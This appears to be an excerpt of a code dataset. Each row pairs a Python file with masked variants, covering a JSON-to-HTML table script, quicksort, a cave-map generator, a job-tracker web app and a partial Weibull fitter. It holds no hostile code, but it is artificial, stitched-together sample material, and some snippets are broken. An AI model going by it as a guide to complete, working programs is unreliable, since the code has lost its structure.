FILE_DIR = os.path.dirname(os.path.abspath(__file__))
SRC_DIR = os.path.dirname(os.path.join(FILE_DIR, '..', '..', ''))
sys.path.append(SRC_DIR)
sys.path.append(FILE_DIR)
from src.util import sanity_util
def jsons_to_table(dir_jsons, dir_out, name, format='html'):
"""
    Extracts the information stored in the JSON files and creates an HTML table for them.
:param dir_jsons: directory of JSON files
:param dir_out: output directory of the HTML-table
:param name: name of the HTML page
"""
# sanity of paths
dir_out = sanity_util.safe_dir_path(dir_path=dir_out)
file_name = sanity_util.unique_file_name(dir=dir_out, fn=name, suffix='.{}'.format(format))
# reading JSON files
p_files = sorted([os.path.join(dir_jsons, p_json) for p_json in os.listdir(dir_jsons)])
table = defaultdict(list)
keys = set()
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
keys.add(k)
for p_f in p_files:
if p_f.lower().endswith('.json'):
with open(p_f, 'r') as f_json:
el = json.load(f_json)
for k in el.keys():
table[k].append(el[k])
for k in keys.difference(set(el.keys())):
table[k].append(None)
# DataFrame conversion
df = pd.DataFrame.from_dict(table)
# writing HTML table
if format == 'html':
table_str = df.to_html()
else:
table_str = df.to_latex()
table_str += '<script type="text/javascript" src="stylize.js"></script>'
stylize_js = js_stylize()
with open(os.path.join(dir_out, 'stylize.js'), 'w') as f_js:
f_js.write(stylize_js)
with open(file_name, 'w') as f_out:
f_out.write(table_str)
def js_stylize():
return '''
/**
* small script to stylize raw html tables
* @author Maximilian Springenberg <[email protected]>
*/
/**
     * adding all bootstrap relevant dependencies to the header
*/
function add_bootsrap(){
document.head.innerHTML +=
"<link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css\">\n" +
"<script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js\"></script>\n" +
"<script src=\"https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js\"></script>\n" +
"<script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js\"></script>";
}
/**
* setting classnames of a specific tag
*/
function style_tag(tagName, className){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].className = className;
}
}
/**
* setting the (Bootstrap) contenteditable flag for a specific tag
*/
function editable_tag(tagName, editable){
tags = document.getElementsByTagName(tagName);
for(let i=0; i<tags.length; ++i){
tags[i].setAttribute('contenteditable', editable);
}
}
// setting title
document.title = 'PHOCNet Table';
// adding bootstrap
add_bootsrap();
// stylize tables
style_tag('table', 'table table-responsive-md');
style_tag('thead', 'thead-dark');
// enable editable table-divisions
editable_tag('td', 'true');
'''
def parser():
"""
Creates a parser of this script.
:return: args-parser with the following arguments
Positional:
=============== ======================================================
arg semantic
=============== ======================================================
dir_jsons directory of JSON files
    dir_out         the directory to save the HTML page to
file_name name of the HTML file
=============== ======================================================
"""
parser = ArgumentParser()
parser.add_argument('dir_jsons', help='dir containing json files')
parser.add_argument('dir_out', help='output directory')
parser.add_argument('file_name', help='name of HTML file')
return parser
if __name__ == '__main__':
arg_parser = parser()
args = vars(arg_parser.parse_args())
    jsons_to_table(dir_jsons=args['dir_jsons'], dir_out=args['dir_out'], name=args['file_name'], format='html')
| [
3,
4,
5,
6,
7
] |
1,622 | 74939f81e999b8e239eb64fa10b56f48c47f7d94 | <mask token>
| <mask token>
if w < 2 or w % 2 != 0 or w <= v:
print('INVALID INPUT')
else:
x = (4 * v - w) // 2
print('TW={0} FW={1}'.format(x, v - x))
| v = int(input())
w = int(input())
if w < 2 or w % 2 != 0 or w <= v:
print('INVALID INPUT')
else:
x = (4 * v - w) // 2
print('TW={0} FW={1}'.format(x, v - x))
| # Problem Statement – An automobile company manufactures both a two wheeler (TW) and a four wheeler (FW). A company manager wants to make the production of both types of vehicle according to the given data below:
# 1st data, Total number of vehicle (two-wheeler + four-wheeler)=v
# 2nd data, Total number of wheels = W
# The task is to find how many two-wheelers as well as four-wheelers need to manufacture as per the given data.
# Example :
# Input :
# 200 -> Value of V
# 540 -> Value of W
# Output :
# TW =130 FW=70
v=int(input())
w=int(input())
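# From t + f = v and 2t + 4f = w it follows that t = (4v - w) / 2 and f = v - t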
if (w<2 or w%2!=0 or w<=v):
print("INVALID INPUT")
else:
x=((4*v)-w)//2
print("TW={0} FW={1}".format(x,v-x))
| null | [
0,
1,
2,
3
] |
1,623 | b9675bc65e06624c7f039188379b76da8e58fb19 | <mask token>
def findKthNode(root, k):
if not root:
return None
if root.number < k or k <= 0:
return None
if k == 1:
return root
if root.left and root.left.number >= k - 1:
return findKthNode(root.left, k - 1)
else:
res = 1 if not root.left else root.left.number + 1
return findKthNode(root.right, k - res)
<mask token>
| <mask token>
def findKthNode(root, k):
if not root:
return None
if root.number < k or k <= 0:
return None
if k == 1:
return root
if root.left and root.left.number >= k - 1:
return findKthNode(root.left, k - 1)
else:
res = 1 if not root.left else root.left.number + 1
return findKthNode(root.right, k - res)
<mask token>
if node:
print(node.n)
| <mask token>
def findKthNode(root, k):
if not root:
return None
if root.number < k or k <= 0:
return None
if k == 1:
return root
if root.left and root.left.number >= k - 1:
return findKthNode(root.left, k - 1)
else:
res = 1 if not root.left else root.left.number + 1
return findKthNode(root.right, k - res)
root = testTree
node = findKthNode(root, 3)
if node:
print(node.n)
| from tree import *
def findKthNode(root, k):
if not root:
return None
if root.number < k or k <= 0:
return None
if k == 1:
return root
if root.left and root.left.number >= k - 1:
return findKthNode(root.left, k - 1)
else:
res = 1 if not root.left else root.left.number + 1
return findKthNode(root.right, k - res)
root = testTree
node = findKthNode(root, 3)
if node:
print(node.n)
| #!/usr/bin/env python
# encoding: utf-8
from tree import *
def findKthNode(root, k):
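    # Returns the k-th node of the tree in pre-order (the root counts as k == 1).
    # Assumes each node's `number` attribute stores the size of its subtree,
    # as provided by the `tree` module imported above.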
if not root:
return None
if root.number < k or k <= 0:
return None
if k == 1:
return root
if root.left and root.left.number >= k-1:
return findKthNode(root.left, k - 1)
else:
res = 1 if not root.left else root.left.number + 1
        return findKthNode(root.right, k - res)
root = testTree
node = findKthNode(root, 3)
if node:
print(node.n)
| [
1,
2,
3,
4,
5
] |
1,624 | 53de53614b3c503a4232c00e8f2fd5a0f4cb6615 | <mask token>
| <mask token>
if __name__ == '__main__':
req = 'https://jsonplaceholder.typicode.com/todos'
response = requests.get(req).json()
d = {}
req_user = 'https://jsonplaceholder.typicode.com/users'
users = requests.get(req_user).json()
for user in users:
reso_todos = ('https://jsonplaceholder.typicode.com/users/{}/todos'
.format(user['id']))
rq = requests.get(reso_todos).json()
list_tasks = []
for content in rq:
d_task = {}
d_task['task'] = content['title']
d_task['completed'] = content['completed']
d_task['username'] = user['username']
list_tasks.append(d_task)
d[user['id']] = list_tasks
with open('todo_all_employees.json', 'w') as f:
json.dump(d, f)
| <mask token>
import json
import requests
import sys
if __name__ == '__main__':
req = 'https://jsonplaceholder.typicode.com/todos'
response = requests.get(req).json()
d = {}
req_user = 'https://jsonplaceholder.typicode.com/users'
users = requests.get(req_user).json()
for user in users:
reso_todos = ('https://jsonplaceholder.typicode.com/users/{}/todos'
.format(user['id']))
rq = requests.get(reso_todos).json()
list_tasks = []
for content in rq:
d_task = {}
d_task['task'] = content['title']
d_task['completed'] = content['completed']
d_task['username'] = user['username']
list_tasks.append(d_task)
d[user['id']] = list_tasks
with open('todo_all_employees.json', 'w') as f:
json.dump(d, f)
| #!/usr/bin/python3
"""
Query the JSONPlaceholder API and write every user's
TODO tasks to a JSON file.
"""
import json
import requests
import sys
if __name__ == "__main__":
req = "https://jsonplaceholder.typicode.com/todos"
response = requests.get(req).json()
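    # NOTE: `response` (the bulk /todos payload) is never used below;
    # tasks are re-fetched per user instead.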
d = {}
req_user = "https://jsonplaceholder.typicode.com/users"
users = requests.get(req_user).json()
for user in users:
reso_todos = "https://jsonplaceholder.typicode.com/users/{}/todos"\
.format(user['id'])
rq = requests.get(reso_todos).json()
list_tasks = []
for content in rq:
d_task = {}
d_task['task'] = content['title']
d_task['completed'] = content['completed']
d_task['username'] = user['username']
list_tasks.append(d_task)
d[user['id']] = list_tasks
with open('todo_all_employees.json', 'w') as f:
json.dump(d, f)
| null | [
0,
1,
2,
3
] |
1,625 | 24cd3a1a05a1cfa638b8264fd89b36ee63b29f89 | <mask token>
| <mask token>
setup(name='CoreMLModules', version='0.1.0', url=
'https://github.com/AfricasVoices/CoreMLModules', packages=[
'core_ml_modules'], setup_requires=['pytest-runner'], install_requires=
['numpy', 'scikit-learn', 'nltk'], tests_require=['pytest<=3.6.4'])
| from setuptools import setup
setup(name='CoreMLModules', version='0.1.0', url=
'https://github.com/AfricasVoices/CoreMLModules', packages=[
'core_ml_modules'], setup_requires=['pytest-runner'], install_requires=
['numpy', 'scikit-learn', 'nltk'], tests_require=['pytest<=3.6.4'])
| from setuptools import setup
setup(
name="CoreMLModules",
version="0.1.0",
url="https://github.com/AfricasVoices/CoreMLModules",
packages=["core_ml_modules"],
setup_requires=["pytest-runner"],
install_requires=["numpy", "scikit-learn", "nltk"],
tests_require=["pytest<=3.6.4"]
)
| null | [
0,
1,
2,
3
] |
1,626 | e7ef8debbff20cb178a3870b9618cbb0652af5af | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import urllib2, os, logging, webapp2, random
#use logging.info("") to print stuff
from google.appengine.ext import webapp
from webapp2_extras import sessions
from google.appengine.ext.webapp import template
from google.appengine.ext import db
from conf import USERS, SESSION_KEY
from google.appengine.ext.db import BadValueError
class Job(db.Model):
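    # Datastore model: one saved job listing, keyed to the owning user.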
title = db.StringProperty()
link = db.LinkProperty()
notes = db.TextProperty()
location = db.StringProperty()
compensation = db.StringProperty()
user = db.StringProperty()
class BaseHandler(webapp2.RequestHandler):
def unset_session(self):
self.session['user'] = ""
def dispatch(self):
self.session_store = sessions.get_store(request=self.request)
try:
webapp2.RequestHandler.dispatch(self)
finally:
self.session_store.save_sessions(self.response)
@webapp2.cached_property
def session(self):
return self.session_store.get_session()
def render_restricted_template(self, view_filename, params={}):
if ('user' in self.session and self.session['user'] != ""):
self.render_template(view_filename, params)
else:
self.render_template('message.html', {'msg': 'Not Logged in.', 'login': True, 'Error': True})
def render_template(self, view_filename, params={}):
path = os.path.join(os.path.dirname(__file__), 'templates', view_filename)
self.response.out.write(template.render(path, params))
class MainHandler(BaseHandler):
def get(self):
jobs = db.GqlQuery("SELECT * FROM Job WHERE user =:username", username=self.session['user'])
jobs_wid = []
for job in jobs:
jobs_wid.append([job, job.key().id()])
self.render_restricted_template('index.html', {'jobs': jobs_wid})
class ActionHandler(BaseHandler):
def get(self):
self.render_restricted_template('index.html', {})
def post(self):
#modify param value
if self.request.get('action') == 'modify' and self.request.get('id') and self.request.get('param') and self.request.get('value'):
job = Job.get_by_id(int(self.request.get('id')))
setattr(job, self.request.get('param'), self.request.get('value'))
job.put()
elif self.request.get('action') == 'delete' and self.request.get('id'):
job = Job.get_by_id(int(self.request.get('id')))
job.delete()
self.render_restricted_template('index.html', {})
class AddJobHandler(BaseHandler):
def get(self):
self.render_restricted_template('index.html', {})
def post(self):
try:
if self.request.get('link'):
link = self.request.get('link')
else:
link = None
job = Job(title=self.request.get('title'), link=link, notes=self.request.get('notes'), location=self.request.get('location'), compensation=self.request.get('compensation'), user=self.session['user'])
job.put()
self.render_restricted_template('index.html', {})
except BadValueError:
self.render_template('message.html', {'msg': 'Invalid Link', 'login': False, 'Error': True})
class LoginHandler(BaseHandler):
def get(self):
self.render_template('message.html', {'msg': 'Not Logged in.', 'login': True, 'Error': True})
def post(self):
if self.request.get('username') in USERS and USERS[self.request.get('username')] == self.request.get('password'):
self.session['user'] = self.request.get('username')
self.render_template('index.html', {'login': True})
else:
self.render_template('message.html', {'msg': 'Incorrect Credentials.', 'login': True, 'Error': True})
class LogoutHandler(BaseHandler):
def get(self):
self.session['user'] = ""
self.render_template('message.html', {'msg': 'Successfully Logged Out.'})
config = {'webapp2_extras.sessions': {'secret_key': SESSION_KEY}}
app = webapp2.WSGIApplication([
webapp2.Route('/', MainHandler, name='home'),
webapp2.Route('/login', LoginHandler, name='login'),
webapp2.Route('/logout', LogoutHandler, name='logout'),
webapp2.Route('/action', ActionHandler, name='action'),
webapp2.Route('/addjob', AddJobHandler, name='addjob')
], config=config, debug=True) | null | null | null | null | [
0
] |
1,627 | 09a5c96b7f496aca6b34d7f0a83d5b1e182ca409 | def quick_sort(arr):
q_sort(arr, 0, len(arr) - 1)
def q_sort(arr, left, right):
if left < right:
pivot_index = partition(arr, left, right)
q_sort(arr, left, pivot_index - 1)
q_sort(arr, pivot_index + 1, right)
<mask token>
| def quick_sort(arr):
q_sort(arr, 0, len(arr) - 1)
def q_sort(arr, left, right):
if left < right:
pivot_index = partition(arr, left, right)
q_sort(arr, left, pivot_index - 1)
q_sort(arr, pivot_index + 1, right)
def partition(arr, left, right):
pivot = arr[left]
while left < right:
while left < right and arr[right] >= pivot:
right -= 1
arr[left] = arr[right]
while left < right and arr[left] <= pivot:
left += 1
arr[right] = arr[left]
arr[left] = pivot
return left
<mask token>
| def quick_sort(arr):
q_sort(arr, 0, len(arr) - 1)
def q_sort(arr, left, right):
if left < right:
pivot_index = partition(arr, left, right)
q_sort(arr, left, pivot_index - 1)
q_sort(arr, pivot_index + 1, right)
def partition(arr, left, right):
pivot = arr[left]
while left < right:
while left < right and arr[right] >= pivot:
right -= 1
arr[left] = arr[right]
while left < right and arr[left] <= pivot:
left += 1
arr[right] = arr[left]
arr[left] = pivot
return left
def partition_1(arr, low, high):
pivot = arr[high]
store_index = low
for i in range(low, high):
if arr[i] < pivot:
arr[store_index], arr[i] = arr[i], arr[store_index]
store_index += 1
arr[store_index], arr[high] = arr[high], arr[store_index]
return store_index
<mask token>
| def quick_sort(arr):
q_sort(arr, 0, len(arr) - 1)
def q_sort(arr, left, right):
if left < right:
pivot_index = partition(arr, left, right)
q_sort(arr, left, pivot_index - 1)
q_sort(arr, pivot_index + 1, right)
def partition(arr, left, right):
pivot = arr[left]
while left < right:
while left < right and arr[right] >= pivot:
right -= 1
arr[left] = arr[right]
while left < right and arr[left] <= pivot:
left += 1
arr[right] = arr[left]
arr[left] = pivot
return left
def partition_1(arr, low, high):
pivot = arr[high]
store_index = low
for i in range(low, high):
if arr[i] < pivot:
arr[store_index], arr[i] = arr[i], arr[store_index]
store_index += 1
arr[store_index], arr[high] = arr[high], arr[store_index]
return store_index
if __name__ == '__main__':
arr = [5, 9, 1, 11, 6, 7, 2, 4]
quick_sort(arr)
print(arr)
| def quick_sort(arr):
q_sort(arr, 0, len(arr) - 1)
def q_sort(arr, left, right):
if left < right:
pivot_index = partition(arr, left, right)
q_sort(arr, left, pivot_index - 1)
q_sort(arr, pivot_index + 1, right)
def partition(arr, left, right):
pivot = arr[left]
while left < right:
        # Scan from the right: skip elements >= pivot until one smaller than
        # the pivot appears
        while left < right and arr[right] >= pivot:
            right -= 1
        # Once found, copy that element into slot `left`; arr[left] and
        # arr[right] now hold the same value
        arr[left] = arr[right]
        # # saves one comparison in the next loop iteration
        # if left < right:
        #     left += 1
        # Scan the left half the same way
        while left < right and arr[left] <= pivot:
            left += 1
        arr[right] = arr[left]
        # if left < right:
        #     right -= 1
    # After one round the list is split into two halves with left == right;
    # write the pivot back into that slot
    arr[left] = pivot
return left
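# partition_1 below is an alternative Lomuto-scheme partition (pivot taken from
# the high end); it is not called by quick_sort above and is kept for comparison.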
def partition_1(arr, low, high):
pivot = arr[high]
    store_index = low  # store_index is where the next element smaller than the pivot goes
for i in range(low, high):
        # current element is smaller than the pivot
if arr[i] < pivot:
arr[store_index], arr[i] = arr[i], arr[store_index]
store_index += 1
arr[store_index], arr[high] = arr[high], arr[store_index]
return store_index
if __name__ == '__main__':
# arr = [3, 44, 38, 5, 47, 15, 36, 26, 27, 2, 46, 4, 19, 50, 48]
arr = [5, 9, 1, 11, 6, 7, 2, 4]
quick_sort(arr)
print(arr)
| [
2,
3,
4,
5,
6
] |
1,628 | 7feac838f17ef1e4338190c0e8c284ed99369693 | <mask token>
def generateNoise():
caveMap = []
column = 1
row = 1
while column <= mapWidth:
while row <= mapHeight:
if (column == 1 or column == mapWidth or row == 1 or row ==
mapHeight):
caveMap.append([column, row, 1])
elif random.randrange(1, 100) <= fillPercent:
caveMap.append([column, row, 1])
else:
caveMap.append([column, row, 0])
row += 1
column += 1
row = 1
printCaveMap(caveMap)
return caveMap
<mask token>
def isWall(caveMap, column, row):
for cell in caveMap:
if cell[0] == column and cell[1] == row and cell[2] == 1:
return True
elif cell[0] == column and cell[1] == row and cell[2] == 0:
return False
else:
continue
def findNeighbors(caveMap, column, row):
neighbors = 0
if isOutOfBounds(column - 1, row - 1):
neighbors += 1
elif isWall(caveMap, column - 1, row - 1):
neighbors += 1
if isOutOfBounds(column, row - 1):
neighbors += 1
elif isWall(caveMap, column, row - 1):
neighbors += 1
if isOutOfBounds(column + 1, row - 1):
neighbors += 1
elif isWall(caveMap, column + 1, row - 1):
neighbors += 1
if isOutOfBounds(column - 1, row):
neighbors += 1
elif isWall(caveMap, column - 1, row):
neighbors += 1
if isOutOfBounds(column + 1, row):
neighbors += 1
elif isWall(caveMap, column + 1, row):
neighbors += 1
if isOutOfBounds(column - 1, row + 1):
neighbors += 1
elif isWall(caveMap, column - 1, row + 1):
neighbors += 1
if isOutOfBounds(column, row + 1):
neighbors += 1
elif isWall(caveMap, column, row + 1):
neighbors += 1
if isOutOfBounds(column + 1, row + 1):
neighbors += 1
elif isWall(caveMap, column + 1, row + 1):
neighbors += 1
return neighbors
def runGeneration(caveMap, generations):
i = 0
for i in range(0, generations):
start_time = time.time()
for cell in caveMap:
if findNeighbors(caveMap, cell[0], cell[1]) < 3:
cell[2] = 0
elif findNeighbors(caveMap, cell[0], cell[1]) > 5:
cell[2] = 1
printCaveMap(caveMap)
end_time = time.time()
print(end_time - start_time, ' seconds')
return caveMap
<mask token>
def main():
caveMap = generateNoise()
runGeneration(caveMap, 2)
<mask token>
| <mask token>
def generateNoise():
caveMap = []
column = 1
row = 1
while column <= mapWidth:
while row <= mapHeight:
if (column == 1 or column == mapWidth or row == 1 or row ==
mapHeight):
caveMap.append([column, row, 1])
elif random.randrange(1, 100) <= fillPercent:
caveMap.append([column, row, 1])
else:
caveMap.append([column, row, 0])
row += 1
column += 1
row = 1
printCaveMap(caveMap)
return caveMap
<mask token>
def isWall(caveMap, column, row):
for cell in caveMap:
if cell[0] == column and cell[1] == row and cell[2] == 1:
return True
elif cell[0] == column and cell[1] == row and cell[2] == 0:
return False
else:
continue
def findNeighbors(caveMap, column, row):
neighbors = 0
if isOutOfBounds(column - 1, row - 1):
neighbors += 1
elif isWall(caveMap, column - 1, row - 1):
neighbors += 1
if isOutOfBounds(column, row - 1):
neighbors += 1
elif isWall(caveMap, column, row - 1):
neighbors += 1
if isOutOfBounds(column + 1, row - 1):
neighbors += 1
elif isWall(caveMap, column + 1, row - 1):
neighbors += 1
if isOutOfBounds(column - 1, row):
neighbors += 1
elif isWall(caveMap, column - 1, row):
neighbors += 1
if isOutOfBounds(column + 1, row):
neighbors += 1
elif isWall(caveMap, column + 1, row):
neighbors += 1
if isOutOfBounds(column - 1, row + 1):
neighbors += 1
elif isWall(caveMap, column - 1, row + 1):
neighbors += 1
if isOutOfBounds(column, row + 1):
neighbors += 1
elif isWall(caveMap, column, row + 1):
neighbors += 1
if isOutOfBounds(column + 1, row + 1):
neighbors += 1
elif isWall(caveMap, column + 1, row + 1):
neighbors += 1
return neighbors
def runGeneration(caveMap, generations):
i = 0
for i in range(0, generations):
start_time = time.time()
for cell in caveMap:
if findNeighbors(caveMap, cell[0], cell[1]) < 3:
cell[2] = 0
elif findNeighbors(caveMap, cell[0], cell[1]) > 5:
cell[2] = 1
printCaveMap(caveMap)
end_time = time.time()
print(end_time - start_time, ' seconds')
return caveMap
def printCaveMap(caveMap):
i = 1
for item in caveMap:
if i == mapWidth + 1:
print('\r')
i = 1
if item[2] == 1:
print(' # ', end='')
else:
print(' ', end='')
i += 1
print('\n', '\n')
def main():
caveMap = generateNoise()
runGeneration(caveMap, 2)
<mask token>
| <mask token>
def generateNoise():
caveMap = []
column = 1
row = 1
while column <= mapWidth:
while row <= mapHeight:
if (column == 1 or column == mapWidth or row == 1 or row ==
mapHeight):
caveMap.append([column, row, 1])
elif random.randrange(1, 100) <= fillPercent:
caveMap.append([column, row, 1])
else:
caveMap.append([column, row, 0])
row += 1
column += 1
row = 1
printCaveMap(caveMap)
return caveMap
def isOutOfBounds(column, row):
if column < 1 or row < 1:
return True
elif column > mapWidth or row > mapHeight:
return True
else:
return False
def isWall(caveMap, column, row):
for cell in caveMap:
if cell[0] == column and cell[1] == row and cell[2] == 1:
return True
elif cell[0] == column and cell[1] == row and cell[2] == 0:
return False
else:
continue
def findNeighbors(caveMap, column, row):
neighbors = 0
if isOutOfBounds(column - 1, row - 1):
neighbors += 1
elif isWall(caveMap, column - 1, row - 1):
neighbors += 1
if isOutOfBounds(column, row - 1):
neighbors += 1
elif isWall(caveMap, column, row - 1):
neighbors += 1
if isOutOfBounds(column + 1, row - 1):
neighbors += 1
elif isWall(caveMap, column + 1, row - 1):
neighbors += 1
if isOutOfBounds(column - 1, row):
neighbors += 1
elif isWall(caveMap, column - 1, row):
neighbors += 1
if isOutOfBounds(column + 1, row):
neighbors += 1
elif isWall(caveMap, column + 1, row):
neighbors += 1
if isOutOfBounds(column - 1, row + 1):
neighbors += 1
elif isWall(caveMap, column - 1, row + 1):
neighbors += 1
if isOutOfBounds(column, row + 1):
neighbors += 1
elif isWall(caveMap, column, row + 1):
neighbors += 1
if isOutOfBounds(column + 1, row + 1):
neighbors += 1
elif isWall(caveMap, column + 1, row + 1):
neighbors += 1
return neighbors
def runGeneration(caveMap, generations):
i = 0
for i in range(0, generations):
start_time = time.time()
for cell in caveMap:
if findNeighbors(caveMap, cell[0], cell[1]) < 3:
cell[2] = 0
elif findNeighbors(caveMap, cell[0], cell[1]) > 5:
cell[2] = 1
printCaveMap(caveMap)
end_time = time.time()
print(end_time - start_time, ' seconds')
return caveMap
def printCaveMap(caveMap):
i = 1
for item in caveMap:
if i == mapWidth + 1:
print('\r')
i = 1
if item[2] == 1:
print(' # ', end='')
else:
print(' ', end='')
i += 1
print('\n', '\n')
def main():
caveMap = generateNoise()
runGeneration(caveMap, 2)
if __name__ == '__main__':
main()
| <mask token>
mapHeight = 30
mapWidth = 30
fillPercent = 45
def generateNoise():
caveMap = []
column = 1
row = 1
while column <= mapWidth:
while row <= mapHeight:
if (column == 1 or column == mapWidth or row == 1 or row ==
mapHeight):
caveMap.append([column, row, 1])
elif random.randrange(1, 100) <= fillPercent:
caveMap.append([column, row, 1])
else:
caveMap.append([column, row, 0])
row += 1
column += 1
row = 1
printCaveMap(caveMap)
return caveMap
def isOutOfBounds(column, row):
if column < 1 or row < 1:
return True
elif column > mapWidth or row > mapHeight:
return True
else:
return False
def isWall(caveMap, column, row):
for cell in caveMap:
if cell[0] == column and cell[1] == row and cell[2] == 1:
return True
elif cell[0] == column and cell[1] == row and cell[2] == 0:
return False
else:
continue
def findNeighbors(caveMap, column, row):
neighbors = 0
if isOutOfBounds(column - 1, row - 1):
neighbors += 1
elif isWall(caveMap, column - 1, row - 1):
neighbors += 1
if isOutOfBounds(column, row - 1):
neighbors += 1
elif isWall(caveMap, column, row - 1):
neighbors += 1
if isOutOfBounds(column + 1, row - 1):
neighbors += 1
elif isWall(caveMap, column + 1, row - 1):
neighbors += 1
if isOutOfBounds(column - 1, row):
neighbors += 1
elif isWall(caveMap, column - 1, row):
neighbors += 1
if isOutOfBounds(column + 1, row):
neighbors += 1
elif isWall(caveMap, column + 1, row):
neighbors += 1
if isOutOfBounds(column - 1, row + 1):
neighbors += 1
elif isWall(caveMap, column - 1, row + 1):
neighbors += 1
if isOutOfBounds(column, row + 1):
neighbors += 1
elif isWall(caveMap, column, row + 1):
neighbors += 1
if isOutOfBounds(column + 1, row + 1):
neighbors += 1
elif isWall(caveMap, column + 1, row + 1):
neighbors += 1
return neighbors
def runGeneration(caveMap, generations):
i = 0
for i in range(0, generations):
start_time = time.time()
for cell in caveMap:
if findNeighbors(caveMap, cell[0], cell[1]) < 3:
cell[2] = 0
elif findNeighbors(caveMap, cell[0], cell[1]) > 5:
cell[2] = 1
printCaveMap(caveMap)
end_time = time.time()
print(end_time - start_time, ' seconds')
return caveMap
def printCaveMap(caveMap):
i = 1
for item in caveMap:
if i == mapWidth + 1:
print('\r')
i = 1
if item[2] == 1:
print(' # ', end='')
else:
print(' ', end='')
i += 1
print('\n', '\n')
def main():
caveMap = generateNoise()
runGeneration(caveMap, 2)
if __name__ == '__main__':
main()
| #!/usr/bin/env python
#v0.2
import random, time
mapHeight = 30
mapWidth = 30
fillPercent = 45
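# module-level config: map dimensions and the percent chance that an interior
# cell starts out as a wall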
def generateNoise():
#generate a grid of cells with height = mapHeight and width = mapWidth with each cell either "walls" (true) or "floors" (false)
#border is guaranteed to be walls and all other spaces have a fillPercent chance of being walls
caveMap = []
column = 1
row = 1
while column <= mapWidth:
while row <= mapHeight:
if (column == 1) or (column == mapWidth) or (row == 1) or (row == mapHeight):
caveMap.append([column, row, 1])
else:
if random.randrange(1,100) <= fillPercent:
caveMap.append([column, row, 1])
else:
caveMap.append([column,row,0])
row += 1
column += 1
row = 1
printCaveMap(caveMap)
return caveMap
def isOutOfBounds(column, row):
#find if a cell is out of bounds based on map size
if column < 1 or row < 1:
return True
elif column > mapWidth or row > mapHeight:
return True
else:
return False
def isWall(caveMap, column, row):
#determine if a cell is a wall or not
#very inefficient - might have to loop through entire list
for cell in caveMap:
if cell[0] == column and cell[1] == row and cell[2] == 1:
return True
elif cell[0] == column and cell[1] == row and cell[2] == 0:
return False
else:
continue
def findNeighbors(caveMap, column, row):
#find the number of walls in a 3x3 pattern around a given cell (determined by column and row)
#there must be a more efficient way to do this, but here we are
neighbors = 0
if isOutOfBounds(column -1, row -1):
neighbors += 1
elif isWall(caveMap, column -1, row -1):
neighbors += 1
if isOutOfBounds(column, row -1):
neighbors += 1
elif isWall(caveMap, column, row -1):
neighbors += 1
if isOutOfBounds(column +1, row -1):
neighbors += 1
elif isWall(caveMap, column +1, row -1):
neighbors += 1
if isOutOfBounds(column -1, row):
neighbors += 1
elif isWall(caveMap, column -1, row):
neighbors += 1
if isOutOfBounds(column +1, row):
neighbors += 1
elif isWall(caveMap, column +1, row):
neighbors += 1
if isOutOfBounds(column -1, row +1):
neighbors += 1
elif isWall(caveMap, column -1, row +1):
neighbors += 1
if isOutOfBounds(column, row +1):
neighbors += 1
elif isWall(caveMap, column, row +1):
neighbors += 1
if isOutOfBounds(column +1, row +1):
neighbors += 1
elif isWall(caveMap, column +1, row +1):
neighbors += 1
return neighbors
def runGeneration (caveMap, generations):
#smooth out random noise using modified 4-5 cellular automata rules
#the entire process is pretty inefficient - it has to loop through the entire list as many as
#(mapWidth * mapHeight * 8) times for potentially millions of comparisons
i =0
for i in range(0, generations):
start_time = time.time()
for cell in caveMap:
if findNeighbors(caveMap,cell[0],cell[1]) < 3:
cell[2] = 0
elif findNeighbors(caveMap, cell[0], cell[1]) > 5:
cell[2] = 1
printCaveMap(caveMap)
end_time = time.time()
print(end_time - start_time, " seconds")
return caveMap
def printCaveMap(caveMap):
#print the map by displaying a grid of characters where # = walls and spaces = floors
#just uses mapWidth to insert returns, very agnostic about the column/row of a cell
i = 1
for item in caveMap:
if i == mapWidth + 1:
print('\r')
i = 1
if item[2] == 1:
print(" # ", end="")
else:
print(" ", end="")
i += 1
print("\n", "\n")
def main():
caveMap = generateNoise()
runGeneration(caveMap, 2)
if __name__ == "__main__":
main() | [
5,
6,
8,
9,
11
] |
1,629 | d39f6fca80f32a4d13764eb5cfb29999785b1d16 | <mask token>
| <mask token>
print(my_randoms)
| <mask token>
my_randoms = random.sample(range(100), 10)
print(my_randoms)
| import random
my_randoms = random.sample(range(100), 10)  # sample() needs a population sequence, not an int
print(my_randoms)
| null | [
0,
1,
2,
3
] |
1,630 | 53509d826b82211bac02ea5f545802007b06781c | <mask token>
| import ludwig.schema.decoders.base
import ludwig.schema.decoders.sequence_decoders
| # Register all decoders
import ludwig.schema.decoders.base
import ludwig.schema.decoders.sequence_decoders # noqa
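# (the imports above run each module's decoder registration at import time;
# the `# noqa` marker silences the unused-import warning)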
| null | null | [
0,
1,
2
] |
1,631 | b10d3d8d0ded0d2055c1abdaf40a97abd4cb2cb8 | <mask token>
def fit(x, iters=1000, eps=1e-06):
"""
Fits a 2-parameter Weibull distribution to the given data using maximum-likelihood estimation.
:param x: 1d-ndarray of samples from an (unknown) distribution. Each value must satisfy x > 0.
:param iters: Maximum number of iterations
    :param eps: Stopping criterion. Fit is stopped if the change between two iterations is smaller than eps.
:return: Tuple (Shape, Scale) which can be (NaN, NaN) if a fit is impossible.
Impossible fits may be due to 0-values in x.
"""
ln_x = np.log(x)
k = 1.0
k_t_1 = k
for t in range(iters):
x_k = x ** k
x_k_ln_x = x_k * ln_x
ff = np.sum(x_k_ln_x)
fg = np.sum(x_k)
f = ff / fg - np.mean(ln_x) - 1.0 / k
ff_prime = np.sum(x_k_ln_x * ln_x)
fg_prime = ff
